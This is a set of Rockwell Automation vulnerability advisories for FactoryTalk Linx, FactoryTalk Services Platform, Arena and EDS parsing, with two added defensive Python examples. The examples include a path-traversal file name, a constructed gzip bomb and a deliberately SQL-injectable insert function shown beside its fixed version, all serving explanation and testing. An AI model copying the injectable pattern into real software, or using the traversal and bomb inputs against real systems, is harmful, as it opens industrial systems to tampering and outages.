Executive Summary

Rockwell Automation received a report from Claroty, an industrial security product vendor and research company, regarding multiple vulnerabilities due to exposed system internals in FactoryTalk® Linx software. These vulnerabilities, if successfully exploited, may result in arbitrary code execution, information exposure, or denial-of-service conditions.

Rockwell Automation has provided software updates containing the remediation to these vulnerabilities. Customers using the affected versions of these products are encouraged to evaluate the mitigations provided below and apply them appropriately.

Affected Products

  • FactoryTalk Linx software versions 6.00, 6.10, and 6.11
The following products utilize FactoryTalk Linx:
  • Connected Components Workbench™ software v12 and earlier
  • ControlFLASH Plus™ software v1 and later
  • ControlFLASH™ software v14 and later
  • FactoryTalk Asset Centre software v9 and later
  • FactoryTalk Linx CommDTM software v1 and later
  • Studio 5000® Launcher software v31 and later
  • Studio 5000 Logix Designer® software v32 and earlier

Vulnerability Details

CVE-2020-11999: Arbitrary code execution due to API abuse
An exposed API call allows users to provide files to be processed without sanitation. This may allow an attacker to specify a filename to execute unauthorized code and modify files or data.

CVSS v3.1 Base Score: 9.6/10[CRITICAL]
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

CVE-2020-12001: Arbitrary code execution due to path traversal
The parsing mechanism that processes certain file types does not provide input sanitation. This may allow an attacker to use specially crafted files to traverse the file system, modify sensitive data, or execute arbitrary code.

CVSS v3.1 Base Score: 9.6/10[CRITICAL]
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

CVE-2020-12003: Information disclosure due to path traversal
An exposed API call allows users to provide files to be processed without sanitation. This may allow an attacker to use specially crafted requests to traverse the file system and expose sensitive data on the local hard drive.

CVSS v3.1 Base Score: 7.5/10[HIGH]
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2020-12005: Denial-of-service conditions due to unrestricted upload of certain file types
A vulnerability exists in the communication function that enables users to upload EDS files by FactoryTalk Linx. This may allow an attacker to upload a rogue EDS.gz file with “bad compression”, consuming all the available CPU resources leading to denial-of-service (DoS) conditions.

CVSS v3.1 Base Score: 7.5/10[HIGH]
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
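An added example, not Rockwell Automation code, of server-side handling for an uploaded EDS.gz file that addresses the two failure modes described above: a file name that escapes the upload directory and a "bad compression" archive that expands without bound. The function names, size limit and sample EDS text are constructed for the example.

```python
"""Name validation plus bounded decompression for an EDS.gz upload."""
import gzip
import os
import tempfile
import zlib


class UploadRejected(ValueError):
    """Raised when an upload fails validation; the caller logs and drops it."""


def safe_target_path(upload_dir: str, client_name: str) -> str:
    """Accept only a bare file name ending in .eds.gz and confirm that the
    resolved path stays inside upload_dir (defeats ../ and absolute names).
    Both '/' and '\\' are rejected because the product runs on Windows."""
    if not client_name or client_name in (".", ".."):
        raise UploadRejected("empty or reserved file name")
    if "/" in client_name or "\\" in client_name or "\0" in client_name:
        raise UploadRejected(f"path separators not allowed: {client_name!r}")
    if not client_name.lower().endswith(".eds.gz"):
        raise UploadRejected(f"unexpected file type: {client_name!r}")
    root = os.path.realpath(upload_dir)
    target = os.path.realpath(os.path.join(root, client_name))
    if os.path.commonpath([root, target]) != root:
        raise UploadRejected(f"name escapes upload directory: {client_name!r}")
    return target


def bounded_gunzip(data: bytes, max_out: int) -> bytes:
    """Inflate a gzip stream but stop as soon as the output would exceed
    max_out bytes, so a tiny archive of highly compressible data cannot
    exhaust CPU or memory (the DoS condition in CVE-2020-12005)."""
    inflater = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)   # gzip framing
    out = bytearray()
    pending = data
    try:
        while pending:
            # ask for at most one byte more than the remaining budget
            chunk = inflater.decompress(pending, max_out - len(out) + 1)
            out += chunk
            if len(out) > max_out:
                raise UploadRejected(f"decompressed size exceeds {max_out} bytes")
            if not chunk and inflater.unconsumed_tail == pending:
                raise UploadRejected("decompressor made no progress")
            pending = inflater.unconsumed_tail
    except zlib.error as exc:
        raise UploadRejected(f"corrupt gzip data: {exc}") from exc
    if not inflater.eof:
        raise UploadRejected("truncated gzip stream")
    return bytes(out)


def store_eds_upload(upload_dir: str, client_name: str, gz_bytes: bytes,
                     max_out: int = 1_000_000) -> str:
    """Validate the name, inflate within budget, then write the plain EDS text.
    Returns the stored path (the '.gz' suffix is dropped)."""
    target = safe_target_path(upload_dir, client_name)
    eds_text = bounded_gunzip(gz_bytes, max_out)
    # loose structural check: every EDS file carries a [File] section
    if b"[File]" not in eds_text:
        raise UploadRejected("payload does not look like an EDS file")
    stored = target[:-3]
    with open(stored, "wb") as fh:
        fh.write(eds_text)
    return stored


# constructed sample inputs (not real EDS content)
SAMPLE_EDS = b'[File]\n        DescText = "constructed sample, not a real EDS";\n'
GOOD_UPLOAD = gzip.compress(SAMPLE_EDS)
# a 16 MiB run of zeros shrinks to a few KiB: the "bad compression" case
BOMB_UPLOAD = gzip.compress(b"\0" * (16 * 1024 * 1024))


def demo():
    """Exercise the three paths. Returns (stored_ok, traversal_rejected, bomb_rejected)."""
    with tempfile.TemporaryDirectory() as upload_dir:
        stored = store_eds_upload(upload_dir, "device.eds.gz", GOOD_UPLOAD)
        with open(stored, "rb") as fh:
            stored_ok = fh.read() == SAMPLE_EDS
        outcomes = []
        for name, payload in (("..\\..\\evil.eds.gz", GOOD_UPLOAD),
                              ("bomb.eds.gz", BOMB_UPLOAD)):
            try:
                store_eds_upload(upload_dir, name, payload)
                outcomes.append(False)
            except UploadRejected:
                outcomes.append(True)
    return stored_ok, outcomes[0], outcomes[1]


if __name__ == "__main__":
    print(demo())
```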

Risk Mitigation & User Action

Customers using the affected products are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
CVEs: CVE-2020-11999, CVE-2020-12001, CVE-2020-12003, CVE-2020-12005
Products Affected:
  • Connected Components Workbench v12 and earlier
  • ControlFLASH Plus v1 and later
  • ControlFLASH v14 and later
  • FactoryTalk Asset Centre v9 and later
  • FactoryTalk Linx CommDTM v1 and later
  • FactoryTalk Linx software (previously called RSLinx Enterprise) versions 6.00, 6.10, and 6.11
  • Studio 5000 Launcher v31 and later
  • Studio 5000 Logix Designer v32 and earlier
Mitigation: Customers are encouraged to apply these patches by following the instructions in the Knowledgebase articles below:
  • Patch Roll-up for CPR9. Knowledgebase Article ID: QA49264
  • FactoryTalk Linx/Services patch. Knowledgebase Article ID: BF24810
  • FactoryTalk Linx patch. Knowledgebase Article ID: BF25509

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Block all traffic to EtherNet/IP™ devices or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP Ports 2222, 7153 and UDP Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article ID BF7490.

General Mitigations
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com). Please direct all media inquiries to Kolve Byrd (kabyrd@ra.rockwell.com).

ADDITIONAL LINKS

  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

Critical
PN1511 | PN1511 | FactoryTalk Linx Path Traversal Vulnerability Found During Pwn2Own Competition
Published Date:
June 24, 2020
Last Updated:
June 24, 2020
CVE IDs:
CVE-2020-12001
Products:
FactoryTalk Linx Gateway
CVSS Scores:
9.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.1
Revision History
Version 1.1 - June 24, 2020. Corrected affected products.
Version 1.0 - June 18, 2020. Initial Release.

Executive Summary

Between January 21-23, 2020, Rockwell Automation participated in the Pwn2Own competition hosted by Trend Micro’s Zero Day Initiative (ZDI). This was ZDI’s first ever Industrial Control Systems (ICS) competition, which was held at the S4 Security conference in Miami, Florida. This competition invites researchers to demonstrate vulnerability exploitation on certain products, and responsibly disclose this information to participating vendors.

During the competition, researchers disclosed an open, unauthenticated port which can allow for a directory traversal. This vulnerability was previously disclosed by Rockwell Automation on June 11, 2020.

Special thanks to researchers at Claroty for submitting this issue through Pwn2Own.

Customers using affected products are encouraged to evaluate their own systems and apply the appropriate risk mitigations from those listed below. Additional details relating to the discovered vulnerabilities and recommended countermeasures, are provided herein.

Affected Products

  • FactoryTalk® Linx software (previously called RSLinx® Enterprise) versions 6.00, 6.10, and 6.11
The following products utilize FactoryTalk Linx:
  • Connected Components Workbench v12 and earlier
  • ControlFLASH™ Plus v1 and later
  • ControlFLASH™ v14 and later
  • FactoryTalk® Asset Centre v9 and later
  • FactoryTalk® Linx CommDTM v1 and later
  • Studio 5000® Launcher v31 and later
  • Studio 5000 Logix Designer® v32 and earlier

Vulnerability Details

CVE-2020-12001: Arbitrary code execution due to directory traversal
The parsing mechanism that processes certain file types does not provide input sanitation. This may allow an attacker to use specially crafted files to traverse the file system and modify sensitive data or execute arbitrary code.

CVSS v3.1 Base Score: 9.6/10[CRITICAL]
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
ZDI Tracking: ZDI-CAN-10292, ZDI-CAN-10298

Risk Mitigation & User Action

Customers using the affected products are encouraged to apply the patch that addresses the associated risk. Customers who are unable to patch are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Information: CVE-2020-12001
Recommended User Actions: Customers are encouraged to apply these patches by following the instructions in the Rockwell Automation Knowledgebase articles below:
  • Patch Roll-up for CPR9 SRx
  • FactoryTalk Linx/Services patch BF24810
  • FactoryTalk Linx patch BF25509

General Security Guidelines

Software/PC-based Mitigation Strategies
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

Social Engineering Mitigation Strategies
  • Do not open untrusted files.
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (kabyrd@ra.rockwell.com).


ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index.
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

High
PN1512 | PN1512 | FactoryTalk Services Platform Vulnerable to Arbitrary COM Instantiation During Pwn2Own Competition
Published Date:
June 18, 2020
Last Updated:
June 18, 2020
CVE IDs:
CVE-2020-12033
Products:
FactoryTalk Services Platform
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - June 18, 2020. Initial Version

Executive Summary

Between January 21-23, 2020, Rockwell Automation participated in the Pwn2Own competition hosted by Trend Micro’s Zero Day Initiative (ZDI). This was ZDI’s first ever Industrial Control Systems (ICS) competition, which was held at the S4 Security conference in Miami, Florida. This competition invites researchers to demonstrate vulnerability exploitation on certain products, and responsibly disclose this information to participating vendors.

During the competition, Rockwell Automation was made aware of a service, which can instantiate a COM object on the affected machine.

Special thanks to researchers at Claroty for submitting this vulnerability through the Pwn2Own competition.

Customers using affected products are encouraged to evaluate their own systems and apply the appropriate risk mitigations from those listed below. Additional details relating to the discovered vulnerabilities and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk Services Platform - All versions

Vulnerability Details

CVE-2020-12033: Arbitrary COM object instantiation due to lack of data validation

FactoryTalk Services Platform redundancy host service (RdcyHost.exe) does not validate supplied identifiers, which could allow an unauthenticated, adjacent attacker to execute remote COM objects with elevated privileges.

CVSS v3.1 Base Score: 7.5/HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
ZDI Tracking: ZDI-CAN-10299

Risk Mitigation & User Action

Customers are encouraged to use Rockwell Automation Knowledgebase article QA5266 to determine if FactoryTalk Services Platform is installed. Those using the affected software are directed towards risk mitigation by enabling built-in security features found within FactoryTalk Services platform. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy. Please subscribe to updates to this advisory and the Industrial Security Advisory Index technote to stay notified.
Vulnerability Information: CVE-2020-12033
Recommended User Actions: This vulnerability is mitigated by implementing a secure communication strategy following the guidance outlined in Rockwell Automation Knowledgebase article QA46277.

General Security Guidelines

Software/PC-based Mitigation Strategies

  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

Social Engineering Mitigation Strategies
  • Do not open untrusted files.
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd(kabyrd@ra.rockwell.com).

ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

High
PN1084 | PN1084 | Multiple Vulnerabilities in Arena Simulation Software
Published Date:
June 08, 2020
Last Updated:
June 08, 2020
CVE IDs:
CVE-2019-13527, CVE-2019-13510, CVE-2019-13519, CVE-2019-13511, CVE-2019-13521
Products:
Arena
CVSS Scores:
7.8, 8.6, 3.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Revision History
Revision Number: 1.2
Version 1.0 - August 1, 2019. Initial Release
Version 1.1 - September 19, 2019. Updated Vulnerability Reports.
Version 1.2 - June 8, 2020. Updated Vulnerability Reports.

Executive Summary

The Zero Day Initiative (ZDI), part of the information security company Trend Micro, reported multiple potential vulnerabilities in Arena Simulation software. These vulnerabilities, if successfully exploited, may allow a remote, unauthenticated attacker to cause denial of service conditions or execute arbitrary code on a system after using previously freed memory.

Successful exploitation of these vulnerabilities relies on a social engineering attack.

Special thanks to Kimiya of 9SG Security team working with ZDI to find these vulnerabilities.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their networks. Additional details relating to the discovered vulnerabilities, including affected products and recommended countermeasures, are provided herein.

Affected Products

Arena® Simulation Software for Manufacturing, Cat. 9502-Ax, Versions 16.00.00 and earlier.

Vulnerability Details

CVE-2019-13510: Denial-of-service file parsing use-after-free potential remote code execution vulnerabilities
If a maliciously crafted Arena® file, also known as a .doe file type, is sent to an unsuspecting victim who is tricked, via social-engineering techniques, into opening the file in Arena®, the software application will crash and result in the potential loss of any unsaved data. The victim will need to restart Arena® to continue normal use. A threat actor may additionally design their malicious file to execute their own code when it is opened by the targeted user, which could result in compromise of the victim’s machine depending on the content of the threat actor’s code.

Note: There are also valid reasons why a file may not open in Arena®. To learn more about these circumstances, please see RAid#1073702.

CVSS v3.1 Base Score: 8.6/10 [HIGH]
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
CVE ID | ZDI Report ID
CVE-2019-13510 | ZDI-CAN-8012, ZDI-CAN-8013, ZDI-CAN-8015, ZDI-CAN-8016, ZDI-CAN-8017, ZDI-CAN-8060, ZDI-CAN-8062, ZDI-CAN-8096, ZDI-CAN-8174, ZDI-CAN-8600, ZDI-CAN-8623, ZDI-CAN-8624, ZDI-CAN-8683, ZDI-CAN-10129, ZDI-CAN-10186, ZDI-CAN-10373, ZDI-CAN-10374, ZDI-CAN-10470, ZDI-CAN-10554, ZDI-CAN-10555, ZDI-CAN-10556, ZDI-CAN-10557, ZDI-CAN-10559


CVE-2019-13511: Use-after-free information disclosure vulnerability
If a maliciously crafted .doe file is sent to an unsuspecting victim who is tricked, via social-engineering techniques, into opening the file in Arena®, information from the targeted workstation could be accessed. However, the threat actor cannot target and retrieve data of their choosing.

CVSS v3.1 Base Score: 3.3/10 [LOW]
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
CVE ID | ZDI Report ID
CVE-2019-13511 | ZDI-CAN-8014

CVE-2019-13519: Denial-of-service file parsing type confusion vulnerability
If a maliciously crafted .doe file is sent to an unsuspecting victim who is tricked, via social-engineering techniques, into opening the file in Arena®, the software application will crash and result in the potential loss of any unsaved data. The victim will need to restart Arena® to continue normal use. A threat actor may additionally design their malicious file to execute their own code when it is opened by the targeted user, which could result in compromise of the victim’s machine depending on the content of the threat actor’s code.

CVSS v3.1 Base Score: 8.6/10 [HIGH]
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
CVE ID | ZDI Report ID
CVE-2019-13519 | ZDI-CAN-8175

CVE-2019-13521: Denial-of-service file type insufficient UI vulnerability
If a maliciously crafted Arena® file, also known as a .doe file type, is sent to an unsuspecting victim who is tricked, via social-engineering techniques, into opening the file in Arena®, the software application will crash and result in the potential loss of any unsaved data. The victim will need to restart Arena® to continue normal use. A threat actor may additionally design their malicious file to execute their own code when it is opened by the targeted user, which could result in compromise of the victim’s machine depending on the content of the threat actor’s code.

CVSS v3.1 Base Score: 7.8/10 [HIGH]
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CVE ID | ZDI Report ID
CVE-2019-13521 | ZDI-CAN-8134

CVE-2019-13527: Denial-of-service conditions due to uninitialized pointer dereference
If a maliciously crafted Arena® file, also known as a .doe file type, is sent to an unsuspecting victim who is tricked, via social-engineering techniques, into opening the file in Arena®, the software application will crash and result in the potential loss of any unsaved data. The victim will need to restart Arena® to continue normal use. The issue results from the lack of proper initialization of a pointer prior to accessing it. A threat actor may additionally design their malicious file to execute their own code when it is opened by the targeted user, which could result in compromise of the victim’s machine depending on the content of the threat actor’s code.

CVSS v3.1 Base Score: 7.8/10 [HIGH]
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CVE ID | ZDI Report ID
CVE-2019-13527 | ZDI-CAN-8682

Risk Mitigation & User Action

Customers using the affected versions of Arena® are encouraged to install the updated revision of software that addresses the associated risk. Customers who are unable to update are directed to the risk mitigation strategies provided below, and are encouraged, when possible, to combine these with secondary mitigations.

  1. Customers using Arena® v16.00.00 are encouraged to implement patch v16.00.01 to address these vulnerabilities (Download).

  2. Do not open untrusted .doe files with Arena® Simulation Software.
  3. Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  4. Use trusted software, software patches, anti-virus/anti-malware programs and interact only with trusted websites and attachments.
  5. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  6. Refer to 546987 - Rockwell Automation Customer Hardening Guidelines for our latest published guidelines for PC hardening and software security.
  7. Use of Microsoft AppLocker or other similar Whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at https://rockwellautomation.custhelp.com/app/answers/detail/a_id/546989.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com). Please direct all media inquiries to Kolve Byrd (kabyrd@ra.rockwell.com).

ADDITIONAL LINKS

  • 54102 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

High
PN1503 | PN1503 | EDS Subsystem Affected by Multiple Vulnerabilities
Published Date:
May 19, 2020
Last Updated:
May 19, 2020
CVE IDs:
CVE-2020-12038, CVE-2020-12034
Products:
Software, Logix Designer, RSNetWorx, FactoryTalk Linx Gateway, RSLinx Classic (Single Node, FactoryTalk Linx / RSLinx Enterprise, RSLogix 5000 / Studio 5000 Logix Designer
CVSS Scores:
8.2, 6.7
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Revision History
Revision Number: 1.0
Version 1.0 - May 19, 2020. Initial Release.

Executive Summary

Rockwell Automation received a report from Claroty, an industrial security product vendor and research company, regarding multiple vulnerabilities in the parsing and storing of Electronic Datasheet (EDS) files in Rockwell Automation® software products. These vulnerabilities, if successfully exploited, may result in code injection and denial-of-service conditions.

EDS files are text files that allow product-specific information to be made available to third-party vendors by Rockwell Automation. These files define a device's configurable parameters and the public interfaces to those parameters for identification and commissioning.

Rockwell Automation has provided software updates containing the remediation to these vulnerabilities. Customers using the affected versions of these products are encouraged to evaluate the mitigations provided below and apply them appropriately.

Affected Products

  • FactoryTalk® Linx software (previously called RSLinx® Enterprise) versions 6.00, 6.10, and 6.11
  • RSLinx® Classic v4.11.00 and earlier
  • RSNetWorx™ software v28.00.00 and earlier
  • Studio 5000 Logix Designer® software v32 and earlier

Vulnerability Details

CVE-2020-12034: SQL injection due to improper input sanitization
The EDS subsystem does not provide adequate input sanitization, which may allow an attacker to craft specialized EDS files to inject SQL queries and manipulate the database storing the EDS files. This may lead to denial-of-service (DoS) conditions or allow an attacker to manipulate the SQL engine to write or modify files on the system. This affects the EDS subsystem v27 and earlier.

CVSS v3.1 Base Score: 8.2/10 [HIGH]
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H

CVE-2020-12038: Denial-of-service conditions due to memory corruption in parsing/storage of EDS files
A memory corruption vulnerability exists in the algorithm that matches square brackets in the EDS subsystem. This may allow an attacker to craft specialized EDS files to crash the EDSParser COM object leading to denial-of-service (DoS) conditions. This affects the EDS subsystem v27 and earlier.

CVSS v3.1 Base Score: 6.7/10 [MEDIUM]
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:H
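Both defects above (CVE-2020-12034 and CVE-2020-12038) sit in how EDS text is handled: bracket matching on section headers, and file contents reaching the SQL layer unsanitized. The following Python is an added example written for this page, not Rockwell Automation's EDS subsystem code. It parses a constructed EDS-style sample (bracketed section headers and "Key = Value;" entries, a layout assumed here for illustration) with bounds-checked header matching that rejects malformed brackets instead of walking off the buffer, and stores the result two ways: the concatenated INSERT that lets file content alter the statement, beside the parameterized INSERT that treats it as data. The MAX_SECTION_NAME limit and the sample values are assumptions, not figures from the advisory.

```python
import re
import sqlite3
from typing import Dict, Optional

# Constructed sample in the layout of an EDS text file (bracketed section
# headers, then "Key = Value;" entries). It is not a real Rockwell EDS file;
# the apostrophe in ProdName is the only thing unusual about it.
SAMPLE_EDS = """\
[File]
    DescText = "Sample device";
    CreateDate = 01-01-2020;
[Device]
    VendCode = 1;
    ProdName = "Widget O'Matic";
"""

MAX_SECTION_NAME = 64  # assumed limit for a section name; not from the advisory


class EdsParseError(ValueError):
    """Raised for malformed input instead of letting the parser misbehave."""


def match_section_header(line: str) -> Optional[str]:
    """Return the section name for a line such as '[Device]', or None for a non-header.

    Every index is validated before use: an unterminated '[', an empty name,
    a nested '[' or an over-long name is rejected rather than walked past the
    end of the buffer, which is the failure class behind a bracket-matching
    memory corruption.
    """
    s = line.strip()
    if not s.startswith("["):
        return None
    end = s.find("]", 1)
    if end == -1:
        raise EdsParseError(f"unterminated section header: {s!r}")
    name = s[1:end]
    if not name or "[" in name or len(name) > MAX_SECTION_NAME:
        raise EdsParseError(f"invalid section name: {name!r}")
    return name


ENTRY_RE = re.compile(r"^\s*(\w+)\s*=\s*(.*?)\s*;\s*$")


def parse_eds(text: str) -> Dict[str, Dict[str, str]]:
    """Parse EDS-style text into {section: {key: value}}; values are plain strings."""
    sections: Dict[str, Dict[str, str]] = {}
    current: Optional[Dict[str, str]] = None
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        name = match_section_header(line)
        if name is not None:
            current = sections.setdefault(name, {})
            continue
        if current is None:
            raise EdsParseError(f"line {lineno}: entry before any section header")
        m = ENTRY_RE.match(line)
        if m is None:
            raise EdsParseError(f"line {lineno}: malformed entry {line!r}")
        current[m.group(1)] = m.group(2).strip('"')
    return sections


def store_unsafe(conn: sqlite3.Connection, sections: Dict[str, Dict[str, str]]) -> None:
    """Vulnerable pattern: file contents spliced into the SQL text.

    Any quote in a value changes the statement's structure, so the file
    author controls the query, not just the data.
    """
    for sec, entries in sections.items():
        for key, value in entries.items():
            conn.execute(f"INSERT INTO eds VALUES ('{sec}', '{key}', '{value}')")


def store_safe(conn: sqlite3.Connection, sections: Dict[str, Dict[str, str]]) -> None:
    """Hardened pattern: bound parameters, so values are only ever data."""
    rows = [(sec, key, value)
            for sec, entries in sections.items()
            for key, value in entries.items()]
    conn.executemany("INSERT INTO eds VALUES (?, ?, ?)", rows)


def demo(text: str = SAMPLE_EDS) -> Dict[str, str]:
    """Store the parsed file both ways and report the stored ProdName or the SQL error."""
    results: Dict[str, str] = {}
    for label, store in (("safe", store_safe), ("unsafe", store_unsafe)):
        conn = sqlite3.connect(":memory:")
        conn.execute("CREATE TABLE eds (section TEXT, key TEXT, value TEXT)")
        try:
            store(conn, parse_eds(text))
            row = conn.execute("SELECT value FROM eds WHERE section = ? AND key = ?",
                               ("Device", "ProdName")).fetchone()
            results[label] = row[0]
        except sqlite3.Error as exc:
            results[label] = "sql error: " + type(exc).__name__
        finally:
            conn.close()
    return results


if __name__ == "__main__":
    print(demo())  # safe stores "Widget O'Matic"; unsafe fails with a syntax error
```

An ordinary apostrophe in a product name is enough to show the difference: the concatenated statement breaks (and, with a differently shaped value, would execute whatever the file supplies), while the parameterized one stores the string intact. The same separation of data from statement text is what removes the injection class regardless of which database engine backs the EDS store.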

Risk Mitigation & User Action

Customers using the affected products are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.

CVE | Products Affected | Mitigation
CVE-2020-12034, CVE-2020-12038 | FactoryTalk® Linx software (previously called RSLinx® Enterprise) versions 6.00, 6.10, and 6.11; RSLinx® Classic v4.11.00 and earlier; RSNetWorx™ software v28.00.00 and earlier; Studio 5000 Logix Designer® software v32 and earlier | Apply patch by following the instructions in knowledgebase article RAid 1125928.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products

  • Block all traffic to EtherNet/IP™ or other CIP™protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP Port#s 2222, 7153 and UDP Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article ID 898270.

General Mitigations

  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

